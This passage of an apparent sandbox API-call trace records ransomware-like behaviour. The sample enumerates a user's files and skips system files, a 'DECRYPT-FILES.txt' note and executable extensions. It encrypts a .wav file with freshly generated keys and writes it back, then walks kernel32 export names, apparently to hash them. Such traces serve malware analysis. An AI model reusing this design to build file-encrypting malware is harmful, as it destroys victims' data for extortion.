(lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.842] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.843] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.843] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.843] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.843] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.843] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.843] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.843] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.843] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.843] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0085.843] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\jkbimi8.tmp" [0085.843] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.844] CloseHandle (hObject=0x0) returned 0 [0085.844] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.844] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc187b0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0xf2627720, ftLastAccessTime.dwHighDateTime=0x1d4d57b, ftLastWriteTime.dwLowDateTime=0xf2627720, ftLastWriteTime.dwHighDateTime=0x1d4d57b, nFileSizeHigh=0x0, nFileSizeLow=0x15a24, dwReserved0=0x0, dwReserved1=0x0, cFileName="_GY3M0t4Il.wav", cAlternateFileName="_GY3M0~1.WAV")) returned 1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="DECRYPT-FILES.txt") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="autorun.inf") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="boot.ini") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="desktop.ini") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="ntuser.dat") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="iconcache.db") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="bootsect.bak") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="ntuser.dat.log") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="thumbs.db") returned -1 [0085.844] lstrcmpiW (lpString1="_GY3M0t4Il.wav", lpString2="Bootfont.bin") returned -1 [0085.844] lstrlenW (lpString="_GY3M0t4Il.wav") returned 14 [0085.844] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.844] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.844] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.844] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.844] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.844] lstrlenW (lpString="_GY3M0t4Il.wav") returned 14 [0085.844] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0085.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="_GY3M0t4Il.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav" [0085.845] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\_gy3m0t4il.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0085.845] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=88612) returned 1 [0085.845] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0085.845] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.845] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.845] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.845] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.846] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0085.846] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.847] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.848] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.849] CloseHandle (hObject=0x444) returned 1 [0085.849] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.849] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0085.850] CloseHandle (hObject=0x0) returned 0 [0085.850] CloseHandle (hObject=0x440) returned 1 [0085.850] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.850] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.850] GetTickCount () returned 0x114deac [0085.850] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.850] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.850] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.851] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.851] lstrlenA (lpString="kernel32.dll") returned 12 [0085.851] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.851] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.851] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.851] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.851] lstrlenA (lpString="ADDATOMA") returned 8 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.851] lstrlenA (lpString="ADDATOMW") returned 8 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.851] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.851] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.851] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.852] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.852] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.852] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.852] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.852] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.852] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.852] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.852] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.852] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.852] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.852] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.852] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.852] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.852] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.852] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.852] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.852] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.852] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.852] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.853] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.853] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.853] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.853] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.853] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.853] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.853] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.853] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.853] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.853] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.853] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.853] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.853] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.853] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.853] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.853] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.853] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.853] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.853] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.853] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.854] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.854] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.854] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.854] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.854] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.854] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.854] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.854] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.854] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.854] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.854] lstrlenA (lpString="BEEP") returned 4 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.854] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.854] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.854] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.854] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.854] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.854] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.854] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.854] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.855] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.855] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.855] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.855] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.855] lstrlenA (lpString="CANCELIO") returned 8 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.855] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.855] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.855] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.855] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.855] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.855] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.855] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.855] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.855] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") 